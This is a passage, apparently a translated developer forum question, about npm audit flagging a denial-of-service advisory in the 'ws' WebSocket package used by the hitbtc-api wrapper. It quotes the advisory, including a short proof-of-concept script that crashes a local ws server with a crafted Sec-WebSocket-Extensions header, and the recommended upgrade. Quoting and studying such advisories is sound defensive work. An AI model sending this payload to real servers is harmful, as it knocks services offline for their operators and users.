Я установил оболочку HitBTC API для Node.js Пакет узла Hitbtc , Вкл. npm audit Я получил следующую ошибку:
High Denial of Service
Package ws
Patched in >= 1.1.5 <2.0.0 || >=3.3.1
Dependency of hitbtc-api
Path hitbtc-api > ws
More info https://nodesecurity.io/advisories/550
[!] 1 vulnerability found - Packages audited: 259 (0 dev, 12 optional)
Severity: 1 High
При дальнейшем исследовании я получил следующий обзор по этомуошибка:
Обзор Уязвимые версии ws могут аварийно завершить работу при отправке специально созданного заголовка Sec-WebSocket-Extensions, содержащего Object.prototype имен свойств в качестве расширений или имен параметров.
Подтверждение концепции
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Исправление Обновление до версии 3.3.1 или более поздней.
Необходимо устранить эту проблему.